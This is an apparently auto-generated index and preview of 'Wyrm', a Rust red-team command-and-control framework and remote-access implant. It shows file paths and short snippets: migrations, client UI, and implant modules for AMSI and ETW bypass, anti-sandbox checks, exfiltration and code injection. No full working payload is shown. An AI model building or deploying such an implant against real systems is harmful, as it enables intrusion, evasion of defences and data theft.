  type FirstRunData (line 328) | pub struct FirstRunData {
  function tasks_contains_kill_agent (line 349) | pub fn tasks_contains_kill_agent<T>(tasks: &T) -> bool
  type WyrmResult (line 357) | pub enum WyrmResult<T: Serialize> {
  method fmt (line 363) | fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
  method default (line 372) | fn default() -> Self {
  function unwrap (line 382) | pub fn unwrap(self) -> T {
  function is_err (line 389) | pub fn is_err(&self) -> bool {
  function is_empty (line 400) | pub fn is_empty(&self) -> bool {
  type NewAgentStaging (line 414) | pub struct NewAgentStaging {
    method from_staged_file_metadata (line 447) | pub fn from_staged_file_metadata(staging_endpoint: &str, download_name...
  type StageType (line 477) | pub enum StageType {
  method fmt (line 485) | fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
  type FileUploadStagingFromClient (line 497) | pub struct FileUploadStagingFromClient {
  type PowershellOutput (line 505) | pub struct PowershellOutput {
  type ExfiltratedFile (line 514) | pub struct ExfiltratedFile {
    method new (line 524) | pub fn new(hostname: String, file_path: String, file_data: Vec<u8>) ->...
  type BaBData (line 534) | pub struct BaBData {
    method from (line 539) | pub fn from(implant_key: String) -> Self {
  type Exports (line 546) | pub type Exports = Option<BTreeMap<String, ExportConfig>>;
  type ExportConfig (line 549) | pub struct ExportConfig {
  type StringStomp (line 558) | pub struct StringStomp {
    method from (line 569) | pub fn from(string_stomp: &Option<StringStomp>) -> Option<Self> {

FILE: shared_c2_client/src/lib.rs
  constant ADMIN_AUTH_SEPARATOR (line 6) | pub const ADMIN_AUTH_SEPARATOR: &str = "=authdivider=";
  type NotificationsForAgents (line 9) | pub type NotificationsForAgents = Vec<NotificationForAgent>;
  type AgentC2MemoryNotifications (line 15) | pub type AgentC2MemoryNotifications = (String, bool, Option<Value>);
  type NotificationForAgent (line 20) | pub struct NotificationForAgent {
  function command_to_string (line 30) | pub fn command_to_string(cmd: &Command) -> String {
  type MitreTTP (line 66) | pub struct MitreTTP<'a> {
  function from (line 74) | pub fn from(
  type MapToMitre (line 89) | pub trait MapToMitre<'a> {
    method map_to_mitre (line 90) | fn map_to_mitre(&'a self) -> MitreTTP<'a>;
  method map_to_mitre (line 94) | fn map_to_mitre(&'a self) -> MitreTTP<'a> {
  type TaskExport (line 264) | pub struct TaskExport<'a> {
  function new (line 270) | pub fn new(task: &'a Task, mitre: MitreTTP<'a>) -> Self {
  type StagedResourceData (line 276) | pub struct StagedResourceData {

FILE: shared_no_std/src/export_resolver.rs
  type ExportResolveError (line 22) | pub enum ExportResolveError {
  function get_module_base (line 36) | fn get_module_base(module_name: &str) -> Option<usize> {
  function to_lowercase_ascii (line 109) | fn to_lowercase_ascii(c: u8) -> u8 {
  function strings_equal_ignore_case (line 114) | fn strings_equal_ignore_case(a: &[u8], b: &[u8]) -> bool {
  function resolve_address (line 140) | pub fn resolve_address(
  function get_rva (line 232) | fn get_rva<T>(base_ptr: *mut u8, offset: usize) -> *mut T {
  function find_export_address (line 237) | pub fn find_export_address(
  function rva_from_file (line 282) | unsafe fn rva_from_file<T>(
  type ExportError (line 313) | pub enum ExportError {
  function find_export_from_unmapped_file (line 321) | pub fn find_export_from_unmapped_file(
  function calculate_memory_delta (line 379) | pub fn calculate_memory_delta(buf_start_address: usize, fn_ptr_address: ...
  function find_entrypoint_from_unmapped_image (line 389) | pub fn find_entrypoint_from_unmapped_image(

FILE: shared_no_std/src/memory.rs
  constant G_PFNSE_DLLLOADED_PATTERN (line 9) | const G_PFNSE_DLLLOADED_PATTERN: &[u8] = &[
  constant G_SHIMS_ENABLED_PATTERN (line 21) | const G_SHIMS_ENABLED_PATTERN: &[u8] = &[
  type ShimErrors (line 27) | pub enum ShimErrors {
  function locate_shim_pointers (line 36) | pub fn locate_shim_pointers() -> Result<EarlyCascadePointers, ShimErrors> {
  type EarlyCascadePointers (line 101) | pub struct EarlyCascadePointers {
  function scan_module_for_byte_pattern (line 119) | pub fn scan_module_for_byte_pattern(
Condensed preview — 171 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (752K chars).
[
  {
    "path": ".dockerignore",
    "chars": 52,
    "preview": ".git\n.gitignore\n**/target\n**/*.pdb\n**/*.exe\n**/*.dll"
  },
  {
    "path": ".gitignore",
    "chars": 590,
    "preview": "c2/target\ntarget\nimplant/target\nclient/target\nclient_v2/target\nshared/target\nshared_c2_client/target\n/c2/staged_files/*\n"
  },
  {
    "path": ".vscode/settings.json",
    "chars": 3751,
    "preview": "{\n    \"cSpell.words\": [\n        \"AMSI\",\n        \"antisandbox\",\n        \"appdomain\",\n        \"askama\",\n        \"Autoloot\""
  },
  {
    "path": "CONTRIBUITIONS.md",
    "chars": 520,
    "preview": "# Contributions\n\nContributions as PR's are not currently accepted.\n\nPlease use the issues tab or discussions as required"
  },
  {
    "path": "Cargo.toml",
    "chars": 123,
    "preview": "[workspace]\nresolver = \"2\"\nmembers = [\"c2\", \"client\", \"implant\", \"loader\", \"shared\", \"shared_c2_client\", \"shared_no_std\""
  },
  {
    "path": "LICENCE",
    "chars": 1060,
    "preview": "MIT License\n\nCopyright (c) 2025 flux\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof th"
  },
  {
    "path": "Milestones.md",
    "chars": 6008,
    "preview": "# Project Milestones\n\nAny item with a (L) tag is a contribution which will not be live (or requires further decision mak"
  },
  {
    "path": "RELEASE_NOTES.md",
    "chars": 15580,
    "preview": "# Release Notes\n\nAnything found labelled with a '&#128679;' indicates a possible breaking change to a profile which you "
  },
  {
    "path": "Readme.md",
    "chars": 7791,
    "preview": "# Wyrm - v0.7.2 Hatchling\n\nWyrm (pronounced 'worm', an old English word for 'serpent' or 'dragon') is a post exploitatio"
  },
  {
    "path": "c2/Cargo.toml",
    "chars": 772,
    "preview": "[package]\nname = \"c2\"\nversion = \"0.1.0\"\nedition = \"2024\"\n\n[dependencies]\nshared = { path = \"../shared\" }\naxum = { versio"
  },
  {
    "path": "c2/Dockerfile",
    "chars": 1691,
    "preview": "FROM lukemathwalker/cargo-chef:latest-rust-1.90-bookworm AS chef\nWORKDIR /app\n\nFROM chef AS planner\nWORKDIR /app\nCOPY . "
  },
  {
    "path": "c2/Readme.md",
    "chars": 2046,
    "preview": "# C2\n\nBefore using the C2, you **SHOULD** change the default admin token and database creds found in the `../.env` for s"
  },
  {
    "path": "c2/migrations/20250614124105_agent_table.sql",
    "chars": 125,
    "preview": "-- Add migration script here\nCREATE TABLE agents (\n    id SERIAL PRIMARY KEY,\n    first_check_in TIMESTAMPTZ DEFAULT now"
  },
  {
    "path": "c2/migrations/20250614124140_add_sleep.sql",
    "chars": 43,
    "preview": "ALTER TABLE agents ADD COLUMN sleep BIGINT;"
  },
  {
    "path": "c2/migrations/20250614132037_tasks.sql",
    "chars": 116,
    "preview": "-- Add migration script here\nCREATE TABLE tasks (\n    id SERIAL PRIMARY KEY,\n    uid TEXT NOT NULL,\n    data TEXT\n);"
  },
  {
    "path": "c2/migrations/20250615070633_flesh_table.sql",
    "chars": 345,
    "preview": "-- Add migration script here\nALTER TABLE tasks\n  ADD COLUMN completed   BOOLEAN    NOT NULL DEFAULT FALSE,\n  ADD COLUMN "
  },
  {
    "path": "c2/migrations/20250615072852_add_col_back_tasks.sql",
    "chars": 75,
    "preview": "-- Add migration script here\nALTER TABLE tasks\n  ADD COLUMN command_id INT;"
  },
  {
    "path": "c2/migrations/20250615085223_add_uid.sql",
    "chars": 70,
    "preview": "-- Add migration script here\nALTER TABLE agents\n  ADD COLUMN uid TEXT;"
  },
  {
    "path": "c2/migrations/20250615085245_add_uid.sql",
    "chars": 29,
    "preview": "-- Add migration script here\n"
  },
  {
    "path": "c2/migrations/20250615211204_rm_col_from_tasks.sql",
    "chars": 82,
    "preview": "-- Add migration script here\nALTER TABLE public.tasks\n  DROP COLUMN IF EXISTS uid;"
  },
  {
    "path": "c2/migrations/20250616171233_ch_col.sql",
    "chars": 691,
    "preview": "-- Add migration script here\nBEGIN;\n\nALTER TABLE tasks\n  DROP CONSTRAINT IF EXISTS fk_tasks_agent;\nDROP INDEX IF EXISTS "
  },
  {
    "path": "c2/migrations/20250619055731_results_table.sql",
    "chars": 243,
    "preview": "-- Add migration script here\nCREATE TABLE completed_tasks (\n    id SERIAL PRIMARY KEY,\n    task_id INT NOT NULL,\n    res"
  },
  {
    "path": "c2/migrations/20250621175632_add_time.sql",
    "chars": 101,
    "preview": "-- Add migration script here\nALTER TABLE agents\n  ADD COLUMN last_check_in TIMESTAMPTZ DEFAULT now();"
  },
  {
    "path": "c2/migrations/20250621180355_add_time.sql",
    "chars": 29,
    "preview": "-- Add migration script here\n"
  },
  {
    "path": "c2/migrations/20250622075242_agent_staging.sql",
    "chars": 277,
    "preview": "-- Add migration script here\nCREATE TABLE agent_staging (\n    id SERIAL PRIMARY KEY,\n    date_added TIMESTAMPTZ DEFAULT "
  },
  {
    "path": "c2/migrations/20250622080004_protect_staging.sql",
    "chars": 228,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n    ADD CONSTRAINT uq_agent_name UNIQUE (agent_name),\n    ADD CON"
  },
  {
    "path": "c2/migrations/20250622080748_remove_constraint.sql",
    "chars": 98,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n  DROP CONSTRAINT IF EXISTS uq_c2_endpoint;"
  },
  {
    "path": "c2/migrations/20250622083052_add_col_staging.sql",
    "chars": 194,
    "preview": "-- Add migration script here\nALTER TABLE agents\n  ADD COLUMN pe_name TEXT;\n\nUPDATE agents\n  SET pe_name = 'oops'\n  WHERE"
  },
  {
    "path": "c2/migrations/20250622094131_add_col_staging_again.sql",
    "chars": 61,
    "preview": "ALTER TABLE agent_staging\n  ADD COLUMN pe_name TEXT NOT NULL;"
  },
  {
    "path": "c2/migrations/20250622094232_del_col_agent.sql",
    "chars": 68,
    "preview": "-- Add migration script here\nALTER TABLE agents DROP COLUMN pe_name;"
  },
  {
    "path": "c2/migrations/20250622122051_protect_pe_name.sql",
    "chars": 102,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n    ADD CONSTRAINT uq_pe_name UNIQUE (pe_name);"
  },
  {
    "path": "c2/migrations/20250622130349_port_to_agent_staging.sql",
    "chars": 86,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n  ADD COLUMN port INT NOT NULL;"
  },
  {
    "path": "c2/migrations/20250622154423_operator_table.sql",
    "chars": 211,
    "preview": "-- Add migration script here\nCREATE TABLE operators (\n    id SERIAL PRIMARY KEY,\n    date_created TIMESTAMPTZ DEFAULT no"
  },
  {
    "path": "c2/migrations/20250622161952_db_add_cstr.sql",
    "chars": 109,
    "preview": "-- Add migration script here\nALTER TABLE operators\n    ADD CONSTRAINT uq_username_operator UNIQUE (username);"
  },
  {
    "path": "c2/migrations/20250624164511_col_for_toks.sql",
    "chars": 97,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n  ADD COLUMN security_token TEXT NOT NULL;"
  },
  {
    "path": "c2/migrations/20250627184526_default_env.sql",
    "chars": 23,
    "preview": "-- actually, not needed"
  },
  {
    "path": "c2/migrations/20250712164452_update_field_for_sleep.sql",
    "chars": 64,
    "preview": "ALTER TABLE agent_staging\n  ALTER COLUMN sleep_time TYPE BIGINT;"
  },
  {
    "path": "c2/migrations/20250712164815_update_field_for_prt.sql",
    "chars": 55,
    "preview": "ALTER TABLE agent_staging\n  ALTER COLUMN port TYPE INT;"
  },
  {
    "path": "c2/migrations/20250712165040_update_field_for_prt_again.sql",
    "chars": 60,
    "preview": "ALTER TABLE agent_staging\n  ALTER COLUMN port TYPE SMALLINT;"
  },
  {
    "path": "c2/migrations/20250719090503_rm_constraint_upload.sql",
    "chars": 97,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n  DROP CONSTRAINT IF EXISTS uq_agent_name;"
  },
  {
    "path": "c2/migrations/20250727101559_xor_payload.sql",
    "chars": 95,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n  ADD COLUMN xor_key smallint DEFAULT 0;"
  },
  {
    "path": "c2/migrations/20251025085314_update_time_completed_field.sql",
    "chars": 98,
    "preview": "-- Add migration script here\nALTER TABLE completed_tasks\nALTER COLUMN time_completed DROP DEFAULT;"
  },
  {
    "path": "c2/migrations/20251026120715_change_dt_field.sql",
    "chars": 135,
    "preview": "-- Add migration script here\n-- ALTER TABLE completed_tasks\n-- ALTER COLUMN time_completed TYPE BIGINT\n-- USING time_com"
  },
  {
    "path": "c2/migrations/20251026121136_change_dt_field_2.sql",
    "chars": 295,
    "preview": "-- Add migration script here\nALTER TABLE completed_tasks\nADD COLUMN time_completed_ms BIGINT NOT NULL\n    DEFAULT ((EXTR"
  },
  {
    "path": "c2/migrations/20251026122000_time_comp_rm.sql",
    "chars": 84,
    "preview": "-- Add migration script here\nALTER TABLE completed_tasks DROP COLUMN time_completed;"
  },
  {
    "path": "c2/migrations/20251026144632_add_agent_id_to_ct.sql",
    "chars": 146,
    "preview": "-- Add migration script here\nALTER TABLE completed_tasks\n    ADD COLUMN agent_id TEXT;\n\nALTER TABLE completed_tasks\n    "
  },
  {
    "path": "c2/migrations/20251119185937_add_pulled_col.sql",
    "chars": 73,
    "preview": "-- Add migration script here\nALTER TABLE tasks\n  ADD COLUMN fetched BOOL;"
  },
  {
    "path": "c2/migrations/20251127184944_download_col.sql",
    "chars": 107,
    "preview": "-- Add migration script here\nALTER TABLE agent_staging\n    ADD COLUMN num_downloads INT NOT NULL DEFAULT 0;"
  },
  {
    "path": "c2/migrations/20251127193415_make_bigint.sql",
    "chars": 142,
    "preview": "ALTER TABLE agent_staging\n    ALTER COLUMN num_downloads TYPE BIGINT;\n\nALTER TABLE agent_staging\n    ALTER COLUMN num_do"
  },
  {
    "path": "c2/migrations/20251207091938_beacon_console_line.sql",
    "chars": 98,
    "preview": "-- Add migration script here\nINSERT INTO agents (uid, sleep)\nVALUES ('doesntmatterwhatthisis', 1);"
  },
  {
    "path": "c2/migrations/20251207092341_testagent.sql",
    "chars": 108,
    "preview": "-- Add migration script here\nINSERT INTO tasks (agent_id, fetched)\nVALUES ('doesntmatterwhatthisis', false);"
  },
  {
    "path": "c2/migrations/20251215120000_completed_tasks_pending_idx.sql",
    "chars": 161,
    "preview": "-- Add migration script here\nCREATE INDEX IF NOT EXISTS idx_completed_tasks_agent_pending\n  ON completed_tasks (agent_id"
  },
  {
    "path": "c2/migrations/20251215123000_tasks_fetched_default.sql",
    "chars": 206,
    "preview": "-- Add migration script here\nUPDATE tasks\nSET fetched = FALSE\nWHERE fetched IS NULL;\n\nALTER TABLE tasks\n    ALTER COLUMN"
  },
  {
    "path": "c2/src/admin_task_dispatch/dispatch_table.rs",
    "chars": 7023,
    "preview": "use std::sync::Arc;\n\nuse crate::{\n    admin_task_dispatch::{\n        delete_staged_resources, drop_file_handler,\n       "
  },
  {
    "path": "c2/src/admin_task_dispatch/execute.rs",
    "chars": 3360,
    "preview": "use std::{path::PathBuf, sync::Arc};\n\nuse axum::extract::State;\nuse serde_json::Value;\nuse shared::{\n    task_types::Dot"
  },
  {
    "path": "c2/src/admin_task_dispatch/implant_builder.rs",
    "chars": 23674,
    "preview": "use std::{\n    env::current_dir,\n    fs::create_dir_all,\n    path::{Path, PathBuf},\n    sync::Arc,\n};\n\nuse axum::extract"
  },
  {
    "path": "c2/src/admin_task_dispatch/mod.rs",
    "chars": 13158,
    "preview": "use std::{\n    path::{Path, PathBuf},\n    sync::Arc,\n};\n\nuse crate::{\n    DB_EXPORT_PATH, FILE_STORE_PATH,\n    app_stat"
  },
  {
    "path": "c2/src/agents.rs",
    "chars": 9674,
    "preview": "use std::{collections::HashMap, sync::Arc};\n\nuse axum::http::HeaderMap;\nuse chrono::{DateTime, Duration, Utc};\nuse serde"
  },
  {
    "path": "c2/src/api/admin_routes.rs",
    "chars": 8550,
    "preview": "use std::{net::SocketAddr, sync::Arc};\n\nuse crate::{\n    AUTH_COOKIE_NAME, COOKIE_TTL,\n    admin_task_dispatch::{dispatc"
  },
  {
    "path": "c2/src/api/agent_get.rs",
    "chars": 2690,
    "preview": "use std::sync::Arc;\n\nuse crate::{\n    agents::handle_kill_command,\n    app_state::AppState,\n    logging::log_error_async"
  },
  {
    "path": "c2/src/api/agent_post.rs",
    "chars": 9275,
    "preview": "use std::sync::Arc;\n\nuse crate::{\n    EXFIL_PATH,\n    agents::{extract_agent_id, handle_kill_command},\n    app_state::Ap"
  },
  {
    "path": "c2/src/api/mod.rs",
    "chars": 61,
    "preview": "pub mod admin_routes;\npub mod agent_get;\npub mod agent_post;\n"
  },
  {
    "path": "c2/src/app_state.rs",
    "chars": 6469,
    "preview": "use std::{\n    collections::{HashMap, HashSet},\n    env,\n    path::PathBuf,\n    sync::Arc,\n    time::{Duration, Instant}"
  },
  {
    "path": "c2/src/db.rs",
    "chars": 18894,
    "preview": "//! All database related functions\n\nuse std::{\n    collections::{HashMap, HashSet},\n    env,\n    time::Duration,\n};\n\nus"
  },
  {
    "path": "c2/src/exfil.rs",
    "chars": 5607,
    "preview": "use std::path::PathBuf;\n\nuse shared::tasks::{ExfiltratedFile, Task};\nuse tokio::io::AsyncWriteExt;\n\nuse crate::{EXFIL_PA"
  },
  {
    "path": "c2/src/logging.rs",
    "chars": 4828,
    "preview": "use std::{env, fmt::Display, io::Write, path::PathBuf};\n\nuse chrono::{SecondsFormat, Utc};\nuse tokio::io::AsyncWriteExt;"
  },
  {
    "path": "c2/src/main.rs",
    "chars": 7836,
    "preview": "#![feature(map_try_insert)]\n\nuse core::panic;\nuse std::{any::Any, net::SocketAddr, sync::Arc, time::Duration};\n\nuse axum"
  },
  {
    "path": "c2/src/middleware.rs",
    "chars": 7131,
    "preview": "use std::{net::SocketAddr, sync::Arc, time::Instant};\n\nuse axum::{\n    extract::{ConnectInfo, Request, State},\n    http:"
  },
  {
    "path": "c2/src/net.rs",
    "chars": 3976,
    "preview": "//! Module relating to functionality over the wire, such as transformation of data in transit\n\nuse axum::{\n    body::Bod"
  },
  {
    "path": "c2/src/pe_utils/mod.rs",
    "chars": 6005,
    "preview": "use std::{io::SeekFrom, path::Path};\n\nuse chrono::NaiveDateTime;\nuse thiserror::Error;\nuse tokio::{\n    fs::{File, OpenO"
  },
  {
    "path": "c2/src/pe_utils/types.rs",
    "chars": 3297,
    "preview": "#[repr(C)]\n#[allow(non_snake_case, non_camel_case_types)]\npub struct IMAGE_FILE_HEADER {\n    pub Machine: IMAGE_FILE_MAC"
  },
  {
    "path": "c2/src/profiles.rs",
    "chars": 11377,
    "preview": "use std::{\n    collections::{BTreeMap, HashSet},\n    path::{Path, PathBuf},\n};\n\nuse serde::Deserialize;\nuse shared::task"
  },
  {
    "path": "client/Caddyfile",
    "chars": 87,
    "preview": ":3000 {\n    root * /usr/share/caddy\n    file_server\n    try_files {path} /index.html\n}\n"
  },
  {
    "path": "client/Cargo.toml",
    "chars": 636,
    "preview": "[package]\nname = \"client\"\nversion = \"0.1.0\"\nedition = \"2024\"\n\n[dependencies]\nshared = { path = \"../shared\" }\n\nleptos = {"
  },
  {
    "path": "client/Dockerfile",
    "chars": 863,
    "preview": "FROM lukemathwalker/cargo-chef:latest-rust-1.90-bookworm AS chef\n\nFROM chef AS planner\nCOPY Cargo.toml ./\nCOPY c2 /c2\nCO"
  },
  {
    "path": "client/index.html",
    "chars": 1026,
    "preview": "<!DOCTYPE html>\n<html lang=\"en\">\n  <head>\n    <meta charset=\"utf-8\">\n    <meta name=\"viewport\" content=\"width=device-wid"
  },
  {
    "path": "client/src/controller/build_profiles.rs",
    "chars": 1519,
    "preview": "use leptos::wasm_bindgen::JsCast;\nuse web_sys::{\n    Blob, BlobPropertyBag, Url,\n    js_sys::{self, Uint8Array},\n    win"
  },
  {
    "path": "client/src/controller/dashboard.rs",
    "chars": 4478,
    "preview": "use std::{\n    collections::{HashMap, HashSet},\n    str::FromStr,\n};\n\nuse chrono::DateTime;\nuse leptos::prelude::*;\n\nuse"
  },
  {
    "path": "client/src/controller/mod.rs",
    "chars": 2595,
    "preview": "use anyhow::bail;\nuse leptos::prelude::{document, window};\nuse serde::{Serialize, de::DeserializeOwned};\nuse web_sys::Ht"
  },
  {
    "path": "client/src/main.rs",
    "chars": 1288,
    "preview": "use leptos::prelude::*;\nuse leptos_meta::{Meta, Title, provide_meta_context};\nuse leptos_router::{components::*, path};\n"
  },
  {
    "path": "client/src/models/dashboard.rs",
    "chars": 25459,
    "preview": "use std::{\n    collections::{HashMap, HashSet},\n    path::{Path, PathBuf},\n};\n\nuse chrono::{DateTime, Utc};\nuse leptos::"
  },
  {
    "path": "client/src/models/mod.rs",
    "chars": 289,
    "preview": "use serde::Serialize;\n\npub mod dashboard;\n\n#[derive(Serialize, Clone, Debug, Default)]\npub struct LoginData {\n    pub c2"
  },
  {
    "path": "client/src/net.rs",
    "chars": 6752,
    "preview": "use gloo_net::http::{Request, Response};\nuse leptos::prelude::window;\nuse serde_json::Value;\nuse shared::{\n    net::{ADM"
  },
  {
    "path": "client/src/pages/build_profiles.rs",
    "chars": 4749,
    "preview": "use leptos::{component, prelude::*};\nuse shared::tasks::AdminCommand;\n\nuse crate::{\n    controller::build_profiles::trig"
  },
  {
    "path": "client/src/pages/dashboard.rs",
    "chars": 18596,
    "preview": "use std::{\n    collections::{HashMap, HashSet},\n    time::Duration,\n};\n\nuse chrono::Utc;\nuse gloo_timers::future::sleep;"
  },
  {
    "path": "client/src/pages/file_upload.rs",
    "chars": 9500,
    "preview": "use gloo_net::http::Request;\nuse leptos::task::spawn_local;\nuse leptos::wasm_bindgen::JsCast;\nuse leptos::{IntoView, com"
  },
  {
    "path": "client/src/pages/logged_in_headers.rs",
    "chars": 6071,
    "preview": "use leptos::wasm_bindgen::JsCast;\nuse leptos::{IntoView, component, prelude::*, task::spawn_local, view};\nuse leptos_rou"
  },
  {
    "path": "client/src/pages/login.rs",
    "chars": 5306,
    "preview": "use leptos::prelude::*;\nuse leptos_router::hooks::use_navigate;\nuse shared::tasks::AdminCommand;\n\nuse crate::{\n    contr"
  },
  {
    "path": "client/src/pages/logout.rs",
    "chars": 1722,
    "preview": "use leptos::{component, prelude::*};\nuse leptos_router::hooks::use_navigate;\nuse shared::tasks::AdminCommand;\nuse web_sy"
  },
  {
    "path": "client/src/pages/mod.rs",
    "chars": 148,
    "preview": "pub mod build_profiles;\npub mod dashboard;\npub mod file_upload;\npub mod logged_in_headers;\npub mod login;\npub mod logout"
  },
  {
    "path": "client/src/pages/staged_resources.rs",
    "chars": 4275,
    "preview": "use leptos::{component, prelude::*};\nuse shared::StagedResourceDataNoSqlx;\nuse shared::tasks::{AdminCommand, WyrmResult}"
  },
  {
    "path": "client/src/tasks/mod.rs",
    "chars": 53,
    "preview": "pub mod task_dispatch;\npub mod task_impl;\nmod utils;\n"
  },
  {
    "path": "client/src/tasks/task_dispatch.rs",
    "chars": 5069,
    "preview": "use std::{collections::HashMap, process::exit};\n\nuse chrono::Utc;\nuse leptos::prelude::{RwSignal, Update, Write, use_con"
  },
  {
    "path": "client/src/tasks/task_impl.rs",
    "chars": 30014,
    "preview": "use std::{collections::HashMap, mem::take};\n\nuse chrono::{DateTime, Utc};\nuse leptos::prelude::{Read, RwSignal, Update, "
  },
  {
    "path": "client/src/tasks/utils.rs",
    "chars": 4736,
    "preview": "use std::mem::take;\n\nuse shared::task_types::RegType;\n\n/// Splits a string into exactly `n` chunks, treating quoted subs"
  },
  {
    "path": "client/static/main_styles.css",
    "chars": 4705,
    "preview": ":root{\n  --agents-h: 30%;\n  --input-h: 48px;\n  --bg: rgb(36,39,58);\n  --link: rgb(202, 211, 245);\n  --link-hover: rgb(24"
  },
  {
    "path": "client/static/styles.css",
    "chars": 7190,
    "preview": ":root{\n  --agents-h: 30%;\n  --input-h: 48px;\n  --bg: rgb(36,39,58);\n  --link: rgb(202, 211, 245);\n  --link-hover: rgb(24"
  },
  {
    "path": "docker-compose.yml",
    "chars": 1095,
    "preview": "services: \n  client:\n    container_name: \"client\"\n    build:\n      context: .\n      dockerfile: client/Dockerfile\n    po"
  },
  {
    "path": "implant/.cargo/config.toml",
    "chars": 323,
    "preview": "[target.x86_64-pc-windows-msvc]\nrustflags = [\n    \"-Z\", \"location-detail=none\",\n    # \"-Z\", \"fmt-debug=none\",\n    \"-C\", "
  },
  {
    "path": "implant/Cargo.toml",
    "chars": 1678,
    "preview": "[package]\nname = \"implant\"\nversion = \"0.1.0\"\nedition = \"2024\"\nbuild = \"build.rs\"\n\n[profile.release]\nopt-level = \"z\"\nlto "
  },
  {
    "path": "implant/Readme.md",
    "chars": 4686,
    "preview": "# Wyrm agent\n\nThe Wyrm agent is a post exploitation Red Team framework designed to operate as a RAT.\n\n## How it works\n\n#"
  },
  {
    "path": "implant/build.rs",
    "chars": 8686,
    "preview": "use std::{\n    env,\n    fmt::Write,\n    fs,\n    mem::take,\n    path::{Path, PathBuf},\n    process::Command,\n};\n\nfn main("
  },
  {
    "path": "implant/rust-toolchain.toml",
    "chars": 163,
    "preview": "[toolchain]\n# # Pin nightly such that we dont get any unexpected breaking changes.\n# # We can update this as required in"
  },
  {
    "path": "implant/set_dbg_env.ps1",
    "chars": 729,
    "preview": "# set-debug-env.ps1\n\n# --- DEBUG configuration ---\n$Env:DEF_SLEEP_TIME = '1'\n$Env:C2_HOST = 'http://127.0.0.1'\n$Env:C2_U"
  },
  {
    "path": "implant/src/anti_sandbox/memory.rs",
    "chars": 915,
    "preview": "use windows_sys::Win32::{\n    Foundation::FALSE, System::SystemInformation::GetPhysicallyInstalledSystemMemory,\n};\n\ncons"
  },
  {
    "path": "implant/src/anti_sandbox/mod.rs",
    "chars": 1426,
    "preview": "mod memory;\nmod trig;\n\n/// This function takes care of anti-sandbox analysis, and depending upon the sandbox checks perf"
  },
  {
    "path": "implant/src/anti_sandbox/trig.rs",
    "chars": 3898,
    "preview": "//! A trigonometric approach to detect human behaviour on an endpoint as seen by\n//! LummaC2 https://outpost24.com/blog/"
  },
  {
    "path": "implant/src/comms.rs",
    "chars": 11896,
    "preview": "//! Implant communications are handled here.\n\nuse std::{fs::File, mem::take, path::Path};\n\nuse crate::{\n    utils::{\n   "
  },
  {
    "path": "implant/src/entry.rs",
    "chars": 3654,
    "preview": "//! Entry module for kicking off the implant, whether from a DLL or an exe.\n\nuse core::{sync::atomic::AtomicBool, time::"
  },
  {
    "path": "implant/src/evasion/amsi.rs",
    "chars": 2930,
    "preview": "use std::ffi::c_void;\n\nuse str_crypter::{decrypt_string, sc};\nuse windows_sys::Win32::System::{\n    Diagnostics::Debug::"
  },
  {
    "path": "implant/src/evasion/etw.rs",
    "chars": 1460,
    "preview": "use std::ffi::c_void;\n\nuse shared_no_std::export_resolver;\nuse shared_no_std::export_resolver::ExportResolveError;\nuse s"
  },
  {
    "path": "implant/src/evasion/mod.rs",
    "chars": 385,
    "preview": "use crate::evasion::etw::etw_bypass;\n\npub mod amsi;\nmod etw;\nmod veh;\n\npub fn run_evasion() {\n    //\n    // Note these f"
  },
  {
    "path": "implant/src/evasion/veh.rs",
    "chars": 2689,
    "preview": "//! This module contains the vectored exception handler when abusing it for evasive purposes\n\nuse std::ffi::c_void;\n\nuse"
  },
  {
    "path": "implant/src/execute/dotnet.rs",
    "chars": 13382,
    "preview": "use core::{ffi::c_void, iter::once, mem::zeroed, ptr::null_mut};\n\nuse shared::{task_types::DotExDataForImplant, tasks::W"
  },
  {
    "path": "implant/src/execute/ffi.rs",
    "chars": 14628,
    "preview": "use std::ffi::{c_long, c_void};\n\nuse windows_sys::{\n    Win32::{\n        Foundation::HANDLE,\n        System::{Com::SAFEA"
  },
  {
    "path": "implant/src/execute/mod.rs",
    "chars": 25,
    "preview": "pub mod dotnet;\nmod ffi;\n"
  },
  {
    "path": "implant/src/lib.rs",
    "chars": 1035,
    "preview": "#![feature(string_remove_matches)]\n#![feature(core_float_math)]\n#![feature(const_option_ops)]\n#![feature(const_trait_imp"
  },
  {
    "path": "implant/src/main.rs",
    "chars": 446,
    "preview": "#![feature(string_remove_matches)]\n#![feature(core_float_math)]\n#![feature(const_option_ops)]\n#![feature(const_trait_imp"
  },
  {
    "path": "implant/src/main_svc.rs",
    "chars": 2481,
    "preview": "#![feature(string_remove_matches)]\n#![feature(core_float_math)]\n#![feature(const_option_ops)]\n#![feature(const_trait_imp"
  },
  {
    "path": "implant/src/native/Readme.md",
    "chars": 182,
    "preview": "# Native\n\nThis module clusters native interactions with the OS where the activity relates to implant\nactions; as opposed"
  },
  {
    "path": "implant/src/native/accounts.rs",
    "chars": 10910,
    "preview": "use std::{ffi::c_void, fmt::Display, mem::transmute, ptr::null_mut, slice::from_raw_parts};\n\nuse serde::Serialize;\nuse s"
  },
  {
    "path": "implant/src/native/filesystem.rs",
    "chars": 16043,
    "preview": "use std::{\n    fs::{self, File},\n    io::{self, Write},\n    path::{Path, PathBuf},\n};\n\nuse serde::Serialize;\nuse shared:"
  },
  {
    "path": "implant/src/native/mod.rs",
    "chars": 90,
    "preview": "pub mod accounts;\npub mod filesystem;\npub mod processes;\npub mod registry;\npub mod shell;\n"
  },
  {
    "path": "implant/src/native/processes.rs",
    "chars": 10067,
    "preview": "//! Native interactions with Windows Processes\n\nuse serde::Serialize;\nuse shared::{\n    stomped_structs::Process,\n    ta"
  },
  {
    "path": "implant/src/native/registry.rs",
    "chars": 13042,
    "preview": "use std::slice::from_raw_parts;\n\nuse serde::Serialize;\nuse shared::{\n    stomped_structs::RegQueryResult,\n    task_types"
  },
  {
    "path": "implant/src/native/shell.rs",
    "chars": 787,
    "preview": "use std::process::Command;\n\nuse serde::Serialize;\nuse shared::tasks::PowershellOutput;\n\nuse crate::wyrm::Wyrm;\n\npub fn r"
  },
